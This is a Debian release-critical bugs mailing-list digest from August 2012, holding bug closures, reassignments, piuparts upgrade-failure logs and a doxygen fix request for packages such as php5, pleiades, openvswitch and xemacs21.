Your message dated Mon, 06 Aug 2012 12:17:43 +
with message-id e1symfj-0002vt...@franck.debian.org
and subject line Bug#683274: fixed in php5 5.4.4-4
has caused the Debian Bug report #683274,
regarding CVE-2012-2688
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
683274: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=683274
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: php5
Version: 5.2.6.dfsg.1-1.174.201203011406
Severity: grave
Tags: security

Please see
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2688
http://git.php.net/?p=php-src.git;a=commitdiff;h=fc74503792b1ee92e4b813690890f3ed38fa3ad5

Cheers,
Moritz
---End Message---
---BeginMessage---
Source: php5
Source-Version: 5.4.4-4

We believe that the bug you reported is fixed in the latest version of
php5, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 683...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Ondřej Surý ond...@debian.org (supplier of updated php5 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Mon, 06 Aug 2012 13:01:42 +0200
Source: php5
Binary: php5 php5-common libapache2-mod-php5 libapache2-mod-php5filter php5-cgi 
php5-cli php5-fpm libphp5-embed php5-dev php5-dbg php-pear php5-curl 
php5-enchant php5-gd php5-gmp php5-imap php5-interbase php5-intl php5-ldap 
php5-mcrypt php5-mysql php5-mysqlnd php5-odbc php5-pgsql php5-pspell 
php5-recode php5-snmp php5-sqlite php5-sybase php5-tidy php5-xmlrpc php5-xsl
Architecture: source amd64 all
Version: 5.4.4-4
Distribution: unstable
Urgency: low
Maintainer: Debian PHP Maintainers pkg-php-ma...@lists.alioth.debian.org
Changed-By: Ondřej Surý ond...@debian.org
Description: 
 libapache2-mod-php5 - server-side, HTML-embedded scripting language (Apache 2 
module)
 libapache2-mod-php5filter - server-side, HTML-embedded scripting language 
(apache 2 filter mo
 libphp5-embed - HTML-embedded scripting language (Embedded SAPI library)
 php-pear   - PEAR - PHP Extension and Application Repository
 php5   - server-side, HTML-embedded scripting language (metapackage)
 php5-cgi   - server-side, HTML-embedded scripting language (CGI binary)
 php5-cli   - command-line interpreter for the php5 scripting language
 php5-common - Common files for packages built from the php5 source
 php5-curl  - CURL module for php5
 php5-dbg   - Debug symbols for PHP5
 php5-dev   - Files for PHP5 module development
 php5-enchant - Enchant module for php5
 php5-fpm   - server-side, HTML-embedded scripting language (FPM-CGI binary)
 php5-gd- GD module for php5
 php5-gmp   - GMP module for php5
 php5-imap  - IMAP module for php5
 php5-interbase - interbase/firebird module for php5
 php5-intl  - internationalisation module for php5
 php5-ldap  - LDAP module for php5
 php5-mcrypt - MCrypt module for php5
 php5-mysql - MySQL module for php5
 php5-mysqlnd - MySQL module for php5 (Native Driver)
 php5-odbc  - ODBC module for php5
 php5-pgsql - PostgreSQL module for php5
 php5-pspell - pspell module for php5
 php5-recode - recode module for php5
 php5-snmp  - SNMP module for php5
 php5-sqlite - SQLite module for php5
 php5-sybase - Sybase / MS SQL Server module for php5
 php5-tidy  - tidy module for php5
 php5-xmlrpc - XML-RPC module for php5
 php5-xsl   - XSL module for php5
Closes: 674205 683274
Changes: 
 php5 (5.4.4-4) unstable; urgency=low
 .
   * Fix php5-fpm segfault (PHP#62205)
   * CVE-2012-2688: potential overflow in _php_stream_scandir
 (Closes: #683274)
   * Improve security in CGI section in README.Debian (Closes: #674205)
Checksums-Sha1: 
 a95e80d4d01a868ab915de7db523910a42b34c26 3706 php5_5.4.4-4.dsc
 fb3327a3b0c23c0e6f88c32d891bd1b28ada7c40 182530 php5_5.4.4-4.diff.gz
 4e8df0ad75c3ad2a18bcadcc8c2c3736ca9ee6cf 582546 php5-common_5.4.4-4_amd64.deb
 66825a29d8ca01f2d24826b752c403fda7d9483f 2663634 
libapache2-mod-php5_5.4.4-4_amd64.deb
 3e5f9a6f1f8c968bf1dbc20733d5e2db587d3518 2662600 
libapache2-mod-php5filter_5.4.4-4_amd64.deb
 80751bbb83f993ec0ba5b2ecd31307b969a51a8c 5096800 php5-cgi_5.4.4-4_amd64.deb
 d1836b1cee35880781f1d146e2144f93edfa4907 2556334 php5-cli_5.4.4-4_amd64.deb
 

Bug#681435: Plans for Catalyst in Wheezy

2012-08-06 Thread intrigeri
Jonas Genannt wrote (06 Aug 2012 09:09:27 GMT) :
 Gitalist was removed by Adam D. Barratt. (#683964)

Thanks a lot, Jonas, for helping us sanitizing this situation.
Sorry this lead to not shipping Gitalist in Wheezy,
I do hope we get it in wheezy-backports soon!


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#679846: marked as done (pleiades: modifies conffile /etc/eclipse.ini owned by eclipse-platform)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 12:47:37 +
with message-id e1symif-0006jm...@franck.debian.org
and subject line Bug#679846: fixed in pleiades 1.3.4-dfsg-3
has caused the Debian Bug report #679846,
regarding pleiades: modifies conffile /etc/eclipse.ini owned by eclipse-platform
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
679846: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=679846
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: pleiades
Version: 1.3.4-dfsg-1
Severity: serious
User: debian...@lists.debian.org
Usertags: piuparts

Hi,

during a test with piuparts I noticed your package modifies a conffile from
eclipse-platform.
This is a violation of policy 10.7.4: Sharing configuration files.
http://www.debian.org/doc/debian-policy/ch-files.html#s-config-files
  The maintainer scripts must not alter a conffile of any package,
   including the one the scripts belong to.

From the attached log (scroll to the bottom...):

  Setting up eclipse-platform (3.8.0~rc4-1) ...
  
  Configuration file `/etc/eclipse.ini'
   == Modified (by you or by a script) since installation.
   == Package distributor has shipped an updated version.
 What would you like to do about it ?  Your options are:
  Y or I  : install the package maintainer's version
  N or O  : keep your currently-installed version
D : show the differences between the versions
Z : start a shell to examine the situation
   The default action is to keep your current version.
  *** eclipse.ini (Y/I/N/O/D/Z) [default=N] ? dpkg: error processing 
eclipse-platform (--configure):
   EOF on stdin at conffile prompt

That happens on upgrades.


cheers,

Andreas


pleiades_1.3.4-dfsg-1.log.gz
Description: GNU Zip compressed data
---End Message---
---BeginMessage---
Source: pleiades
Source-Version: 1.3.4-dfsg-3

We believe that the bug you reported is fixed in the latest version of
pleiades, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 679...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Hideki Yamane henr...@debian.org (supplier of updated pleiades package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Mon, 06 Aug 2012 18:29:33 +0900
Source: pleiades
Binary: pleiades
Architecture: source all
Version: 1.3.4-dfsg-3
Distribution: experimental
Urgency: low
Maintainer: Hideki Yamane henr...@debian.org
Changed-By: Hideki Yamane henr...@debian.org
Description: 
 pleiades   - Japanese translation plug-in for Eclipse using dynamic AOP
Closes: 678739 679846
Changes: 
 pleiades (1.3.4-dfsg-3) experimental; urgency=low
 .
   * debconf/po
 - add Portuguese translation (Closes: #678739)
   * temporary disabled debconf usage, its behaivior violates policy and I'll
 look for another solution after Wheezy will be released (Closes: #679846)
Checksums-Sha1: 
 3068e5863db402545b204d34599e88af6e5f39b4 1867 pleiades_1.3.4-dfsg-3.dsc
 7c9a9dcaa83103f04b531b34ae96b718f0a8fe7b 23536 
pleiades_1.3.4-dfsg-3.debian.tar.gz
 99677441365e052a1af330bf8c779207fa793e21 4626054 pleiades_1.3.4-dfsg-3_all.deb
Checksums-Sha256: 
 23739362364216d4be1b3f77fb1f77bf042c586ae4621f4aac9ceb7c423b93cc 1867 
pleiades_1.3.4-dfsg-3.dsc
 1ae8fb9351cc431beec132331f48b85030820bbaa7d0a19eee4cca9d597c0bac 23536 
pleiades_1.3.4-dfsg-3.debian.tar.gz
 6e76d41880010f94b30beb546f727a9197cbbe26fdf28a546b255eecb8d18c95 4626054 
pleiades_1.3.4-dfsg-3_all.deb
Files: 
 c441511a2d95bf8871e1982d8d0acb51 1867 devel extra pleiades_1.3.4-dfsg-3.dsc
 5312700a6e5bf741fc0297717ae19e15 23536 devel extra 
pleiades_1.3.4-dfsg-3.debian.tar.gz
 d584bbd4cd727612d6455a860d2fc6f3 4626054 devel extra 
pleiades_1.3.4-dfsg-3_all.deb

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.12 (GNU/Linux)

iQIcBAEBCgAGBQJQH5V3AAoJEF0yjQgqqrFAMIAQAINo7PvE1WfOOsd+e9tJvXoU
Xa726kE1invm5KOmOICtae4WrNX4OJWpKo84hILU1Op8RXmYrpa/hzCikMZuLlRd
v1nvpNuCkZy+kUU+in9AhAZ+LB+ai0UWNmwf0L754BihnG1iFqCQg5JYwbjWRvN5
87geucAeHSgUqLR7gCcCzfQQMT6Tie8Wzsc5oTW9Xx79DNqd0hku+corWvk6cqxP
w1w82ViIVY2HpKl+vCyHg+X/Fa4e5xpV8ZXf8EqdYqS6tq+B4CF8fmrm9BjAcXUb
DhTdcKcM/CRytP0mcmNfWrN7WHaLRI1vOd+0Wjjx2vj3VpP+Ha/yavJFG9re+1Mh

Bug#678890: scim: fail to start scim after latest upgrade

2012-08-06 Thread Yukiharu YABUKI
reassign 678890 prime
thanks

Hi, guys

It seems to me that this issue based on ruby transition.


prime package should change point from '/usr/bin/env ruby'
to '/usr/bin/ruby1.8' in src directory in deban source.

I made fixed package, if omote-san does not have time.
I will do NMU.

--
Yukiharu YABUKI yyab...@debian.org


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#680060: Linux guests shut off early in boot process

2012-08-06 Thread Marc Haber
On Mon, Aug 06, 2012 at 03:32:45PM +0400, Michael Tokarev wrote:
 No reply for more than a month, assuming the initial guess was right,

I apologize. Your guess _was_ right.

Greetings
Marc

-- 
-
Marc Haber | I don't trust Computers. They | Mailadresse im Header
Mannheim, Germany  |  lose things.Winona Ryder | Fon: *49 621 31958061
Nordisch by Nature |  How to make an American Quilt | Fax: *49 621 31958062


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: reassign 678890 prime

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 reassign 678890 prime
Bug #678890 [scim-prime] scim: fail to start scim after latest upgrade
Bug reassigned from package 'scim-prime' to 'prime'.
Ignoring request to alter found versions of bug #678890 to the same values 
previously set
Ignoring request to alter fixed versions of bug #678890 to the same values 
previously set
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
678890: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=678890
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#670292: xemacs21-gnome-{, no-}mule{, -canna-wnn}: fails to upgrade from squeeze: apt-get dist-upgrade hangs forever

2012-08-06 Thread OHURA Makoto
tags 670292 pending
thanks

  Hi.

  I've fixed this in my local repository.  If there is no symlinks to
/usr/share/xemacs-21.4.22 in /usr/lib/xemacs-21.4.22, we'll fail to
upgrade or install xemacs21.  I'll upload new revision soon.

  Thanks.

At Tue, 24 Apr 2012 18:43:42 +0200,
Andreas Beckmann wrote:

 Package: 
 xemacs21-gnome-mule,xemacs21-gnome-nomule,xemacs21-gnome-mule-canna-wnn
 Version: 21.4.22-3.2
 Severity: serious
 User: debian...@lists.debian.org
 Usertags: piuparts

 Hi,

 during a test with piuparts I noticed your package fails to upgrade from
 'squeeze'.
 It installed fine in 'squeeze', then the upgrade to 'sid' fails.

 From the attached log (scroll to the bottom...):


 [...]
 1m27.0s DEBUG: Starting command: ['chroot', '/tmp/piupartss/tmp9G4jkK', 
 'apt-get', '-yf', 'dist-upgrade']
 21m27.0s ERROR: Terminating command due to excessive runtime
 21m27.5s DUMP:


   * Command was terminated after exceeding runtime limit (1200 s) *
 21m27.5s ERROR: Command failed (status=-15): ['chroot', 
 '/tmp/piupartss/tmp9G4jkK', 'apt-get', '-yf', 'dist-upgrade']
 [...]


 The test is terminated the same way for xemacs21-gnome-mule,
 xemacs21-gnome-nomule, xemacs21-gnome-mule-canna-wnn.

 I also tried to perform the upgrade manually in a minimal chroot as used
 by piuparts and see where it hangs, but instead I caught some failures
 from emacsen-common:


 [...]
 Setting up emacsen-common (1.4.23) ...
 emacsen-common: Handling install of emacsen flavor emacs
 emacsen-common: Handling install of emacsen flavor xemacs21
 emacsen-common: byte-compiling for xemacs21

 WARNING:
 Couldn't find obvious defaults for:
 data-directory
 mule-lisp-directory
 lisp-directory
 Perhaps some directories don't exist, or the XEmacs executable,
 /usr/bin/xemacs21
 is in a strange place?Loading /usr/share/emacs/site-lisp/debian-startup...
 Loading 00debian...
 Error while loading 00debian: Symbol's function definition is void: loop
 Loading 00debian-vars...
 Symbol's function definition is void: batch-byte-compile
 xemacs exiting
 .
 emacs-package-install: 
 /usr/lib/emacsen-common/packages/install/emacsen-common xemacs21 xemacs21 
 failed at /usr/lib/emacsen-common/emacs-package-install line 30, TSORT line 
 1.
 dpkg: error processing emacsen-common (--configure):
  subprocess installed post-installation script returned error exit status 255
 [...]
 dpkg: dependency problems prevent configuration of xemacs21-gnome-mule:
  xemacs21-gnome-mule depends on xemacs21-mule; however:
   Package xemacs21-mule is not configured yet.
 dpkg: error processing xemacs21-gnome-mule (--configure):
  dependency problems - leaving unconfigured
 [...]


 cheers,

 Andreas



  OHURA Makoto: oh...@debian.org(Debian Project)
oh...@netfort.gr.jp(LILO/Netfort)
  GnuPG public key: http://www.netfort.gr.jp/~ohura/gpg.asc.txt
fingerprint: 54F6 D1B1 2EE1 81CD 65E3  A1D3 EEA2 EFA2 77DC E083
  http://www.netfort.gr.jp/~ohura/


pgp0thACYGx3r.pgp
Description: PGP signature


Processed: Re: Bug#670292: xemacs21-gnome-{, no-}mule{, -canna-wnn}: fails to upgrade from squeeze: apt-get dist-upgrade hangs forever

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 tags 670292 pending
Bug #670292 
[xemacs21-gnome-mule,xemacs21-gnome-nomule,xemacs21-gnome-mule-canna-wnn] 
xemacs21-gnome-{, no-}mule{, -canna-wnn}: fails to upgrade from squeeze: 
apt-get dist-upgrade hangs forever
Added tag(s) pending.
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
670292: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=670292
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: severity of 644131 is serious

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 644131 serious
Bug #644131 [id-utils] id-utils is GPLv3+  GFDLv1.3+, but debian/copyright 
claims GPLv2+
Severity set to 'serious' from 'normal'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
644131: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=644131
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#678249: (no subject)

2012-08-06 Thread Emmanuel Kasper
I have recompiled mame with the current wheezy gcc (Debian 4.7.1-6), and 
I cannot make mame segfault anymore on i386.


I have seen there has been a slew of bug fixes in the debian gcc 
changelog but nothing that I can really pin point to this bug.


As the best way to see if a bug still exist, is to reproduce it ;)
could you maybe recompile the mame binary on your system with -O3, the 
current wheezy compiler mentionned aboce and see if it still segfaults ?


mame -verbose
Parsing mame.ini
Parsing mame.ini
Build version:  0.146 (Aug  6 2012)
Build architecure:  SDLMAME_ARCH=-march=pentium2
Build defines 1:SDLMAME_UNIX=1 SDLMAME_X11=1 SDLMAME_LINUX=1
Build defines 1:LSB_FIRST=1 DISTRO=generic SYNC_IMPLEMENTATION=tc
SDL/OpenGL defines: SDL_COMPILEDVERSION=1215 USE_OPENGL=1 USE_DISPATCH_GL=1
Compiler defines A: __GNUC__=4 __GNUC_MINOR__=7 __GNUC_PATCHLEVEL__=1 
__VERSION__=4.7.1



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Processed: severity of 636805 is grave

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 severity 636805 grave
Bug #636805 [viewvc] viewvc runs extremely slowly (~15s per page)
Severity set to 'grave' from 'important'
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
636805: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=636805
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684056: openvswitch

2012-08-06 Thread Bastian Blank
Package: openvswitch-switch
Version: 1.4.2+git20120612-8
Severity: grave

Subject: openvswitch-switch - Does not start with upstream openvswitch
Package: openvswitch-switch
Version: 1.4.2+git20120612-8
Severity: grave



-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'proposed-updates'), (500, 'unstable'), 
(500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.5-trunk-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages openvswitch-switch depends on:
ii  libc6   2.13-33
ii  libssl1.0.0 1.0.1c-3
ii  module-init-tools   8-2
ii  netbase 5.0
ii  openvswitch-common  1.4.2+git20120612-8
ii  procps  1:3.3.3-2
ii  python  2.7.3~rc2-1
ii  uuid-runtime2.20.1-5.1

openvswitch-switch recommends no packages.

Versions of packages openvswitch-switch suggests:
pn  openvswitch-datapath-module  none

-- no debconf information

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'proposed-updates'), (500, 'unstable'), 
(500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.5-trunk-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages openvswitch-switch depends on:
ii  libc6   2.13-33
ii  libssl1.0.0 1.0.1c-3
ii  module-init-tools   8-2
ii  netbase 5.0
ii  openvswitch-common  1.4.2+git20120612-8
ii  procps  1:3.3.3-2
ii  python  2.7.3~rc2-1
ii  uuid-runtime2.20.1-5.1

openvswitch-switch recommends no packages.

Versions of packages openvswitch-switch suggests:
pn  openvswitch-datapath-module  none

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#684057: openvswitch-switch - Does not start with upstream openvswitch module

2012-08-06 Thread Bastian Blank
Package: openvswitch-switch
Version: 1.4.2+git20120612-8
Severity: grave

The openvswitch-switch init script fails if openvswitch included in
Linux should be used.

| # invoke-rc.d openvswitch-switch start
| FATAL: Module openvswitch_mod not found.
| Inserting openvswitch module ... failed!
| Module has probably not been built for this kernel.
| Install the openvswitch-datapath-source package, then read
| /usr/share/doc/openvswitch-datapath-source/README.Debian
| FATAL: Module openvswitch_mod not found.
| Inserting openvswitch module ... failed!
| invoke-rc.d: initscript openvswitch-switch, action start failed.

The module is already loaded:
| # lsmod | grep openvswitch
| openvswitch33734  0 

Bastian

-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'proposed-updates'), (500, 'unstable'), 
(500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.5-trunk-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages openvswitch-switch depends on:
ii  libc6   2.13-33
ii  libssl1.0.0 1.0.1c-3
ii  module-init-tools   8-2
ii  netbase 5.0
ii  openvswitch-common  1.4.2+git20120612-8
ii  procps  1:3.3.3-2
ii  python  2.7.3~rc2-1
ii  uuid-runtime2.20.1-5.1

openvswitch-switch recommends no packages.

Versions of packages openvswitch-switch suggests:
pn  openvswitch-datapath-module  none


-- System Information:
Debian Release: wheezy/sid
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'proposed-updates'), (500, 'unstable'), 
(500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 3.5-trunk-amd64 (SMP w/2 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages openvswitch-switch depends on:
ii  libc6   2.13-33
ii  libssl1.0.0 1.0.1c-3
ii  module-init-tools   8-2
ii  netbase 5.0
ii  openvswitch-common  1.4.2+git20120612-8
ii  procps  1:3.3.3-2
ii  python  2.7.3~rc2-1
ii  uuid-runtime2.20.1-5.1

openvswitch-switch recommends no packages.

Versions of packages openvswitch-switch suggests:
pn  openvswitch-datapath-module  none

-- no debconf information


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#649068: marked as done (rgmanager and resource-agents: error when trying to install together)

2012-08-06 Thread Debian Bug Tracking System
Your message dated Mon, 06 Aug 2012 17:29:32 +0200
with message-id 501fe2dc.5080...@hastexo.com
and subject line Bug fixed in Unstable
has caused the Debian Bug report #649068,
regarding rgmanager and resource-agents: error when trying to install together
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
649068: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=649068
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: resource-agents,rgmanager
Version: resource-agents/1:3.9.2-5
Version: rgmanager/3.0.12-3
Severity: serious
User: trei...@debian.org
Usertags: edos-file-overwrite

Date: 2011-11-17
Architecture: amd64
Distribution: sid

Hi,

automatic installation tests of packages that share a file and at the
same time do not conflict by their package dependency relationships has
detected the following problem:


WARNING: The following packages cannot be authenticated!
  perl libtext-charwidth-perl perl-base liblocale-gettext-perl
  libtext-iconv-perl perl-modules libswitch-perl libclass-isa-perl libtinfo5
  libbsd0 libedit2 libkeyutils1 libkrb5support0 libk5crypto3 libkrb5-3
  libgssapi-krb5-2 libsasl2-2 libldap-2.4-2 libpcre3 libgssglue1 libtirpc1
  libwrap0 libnspr4-0d libnss3-1d libcorosync4 libxml2 libccs3 libcman3
  libdlm3 libdlmcontrol3 libfence4 liblogthread3 libsackpt3
  libavahi-common-data libavahi-common3 libdbus-1-3 libavahi-client3
  libcap-ng0 dmsetup libdevmapper1.02.1 libnl1 libnuma1 libpcap0.8
  libxenstore3.0 libyajl1 libvirt0 corosync libsaamf3 libsaclm3 libsaevt3
  libsalck3 libsamsg4 libsatmr3 openais python2.7-minimal mime-support
  libdb4.8 libexpat1 python2.7 python-minimal python libopenipmi0 libsnmp-base
  libperl5.14 libsensors4 libsnmp15 openipmi libsgutils2-2 sg3-utils
  python-central python-pexpect libnet-snmp-perl libnet-telnet-perl snmp
  telnet openssh-client python-support python-openssl libxml2-utils cman
  libsigsegv2 gawk librtmp0 libssh2-1 openssl ca-certificates libcurl3
  libglib2.0-0 libdbus-glib-1-2 libltdl7 libcap2 libevent-1.4-2 libnfsidmap2
  rpcbind ucf nfs-common libpils2 libplumb2 liblrm2 libopenhpi2 libplumbgpl2
  libstonith1 libtimedate-perl cluster-glue libnet1 libsysfs2
  nfs-kernel-server resource-agents iputils-arping rgmanager

Extracting templates from packages: 27%
Extracting templates from packages: 54%
Extracting templates from packages: 81%
Extracting templates from packages: 100%
Preconfiguring packages ...
Authentication warning overridden.
Can not write log, openpty() failed (/dev/pts not mounted?)
(Reading database ... 10587 files and directories currently installed.)
Preparing to replace perl 5.12.4-6 (using .../perl_5.14.2-4_amd64.deb) ...
Unpacking replacement perl ...
Preparing to replace libtext-charwidth-perl 0.04-7 (using 
.../libtext-charwidth-perl_0.04-7+b1_amd64.deb) ...
Unpacking replacement libtext-charwidth-perl ...
Preparing to replace perl-base 5.12.4-6 (using 
.../perl-base_5.14.2-4_amd64.deb) ...
Unpacking replacement perl-base ...
Processing triggers for man-db ...
Can not write log, openpty() failed (/dev/pts not mounted?)
Setting up perl-base (5.14.2-4) ...
Can not write log, openpty() failed (/dev/pts not mounted?)
(Reading database ... 10618 files and directories currently installed.)
Preparing to replace liblocale-gettext-perl 1.05-7 (using 
.../liblocale-gettext-perl_1.05-7+b1_amd64.deb) ...
Unpacking replacement liblocale-gettext-perl ...
Preparing to replace libtext-iconv-perl 1.7-4 (using 
.../libtext-iconv-perl_1.7-4+b1_amd64.deb) ...
Unpacking replacement libtext-iconv-perl ...
Preparing to replace perl-modules 5.12.4-6 (using 
.../perl-modules_5.14.2-4_all.deb) ...
Unpacking replacement perl-modules ...
Selecting previously unselected package libswitch-perl.
Unpacking libswitch-perl (from .../libswitch-perl_2.16-2_all.deb) ...
Selecting previously unselected package libclass-isa-perl.
Unpacking libclass-isa-perl (from .../libclass-isa-perl_0.36-2_all.deb) ...
Selecting previously unselected package libtinfo5.
Unpacking libtinfo5 (from .../libtinfo5_5.9-4_amd64.deb) ...
Selecting previously unselected package libbsd0.
Unpacking libbsd0 (from .../libbsd0_0.3.0-1_amd64.deb) ...
Selecting previously unselected package libedit2.
Unpacking libedit2 (from .../libedit2_2.11-20080614-3_amd64.deb) ...
Selecting previously unselected package libkeyutils1.
Unpacking libkeyutils1 (from .../libkeyutils1_1.5.2-2_amd64.deb) ...
Selecting previously unselected package libkrb5support0.
Unpacking libkrb5support0 (from .../libkrb5support0_1.9.1+dfsg-3_amd64.deb) ...
Selecting previously unselected package 

Processed: closing 684056

2012-08-06 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

 close 684056
Bug #684056 [openvswitch-switch] openvswitch
Marked Bug as done
 thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
684056: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=684056
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#676423: NMUing doxygen to testing-proposed-updates

2012-08-06 Thread Thibaut Paumard
Dear release team (and Matthias),

Concerning http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=676423

There is a grave bug in doxygen (segfault which causes other packages to
FTBFS) which has been fixed in unstable together with other minor fixes,
including a new upstream release. I believe that means that this fixed
package will not be able to migrate to testing.

I would like to upload a minimalistic fix to testing-proposed-updates as
an NMU. The package would simply add this patch:
 
http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=21;filename=fix_676423_segfault.patch;att=1;bug=676423

and the version number would be 1.8.1-1+deb70u1 (as per my understanding
of
http://www.debian.org/doc/manuals/developers-reference/pkgs.html#nmu-changelog
).

A prospective debdiff is attached.

Is that good for you?

Kind regards, Thibaut.
diff -Nru doxygen-1.8.1.1/debian/changelog doxygen-1.8.1.1/debian/changelog
--- doxygen-1.8.1.1/debian/changelog2012-06-13 00:52:55.0 +0200
+++ doxygen-1.8.1.1/debian/changelog2012-08-06 14:49:31.0 +0200
@@ -1,3 +1,11 @@
+doxygen (1.8.1.1-1+deb70u1) testing-proposed-updates; urgency=low
+
+  * Non-maintainer upload
+  * Bug fix: new segmentation faults in version 1.8.1-1, thanks to Boris
+Pek (Closes: #676423).
+
+ -- Thibaut Paumard paum...@users.sourceforge.net  Mon, 06 Aug 2012 14:49:31 
+0200
+
 doxygen (1.8.1.1-1) unstable; urgency=low
 
   * doxygen 1.8.1.1 (bug fix) release.
diff -Nru doxygen-1.8.1.1/debian/patches/fix_676423_segfault.patch 
doxygen-1.8.1.1/debian/patches/fix_676423_segfault.patch
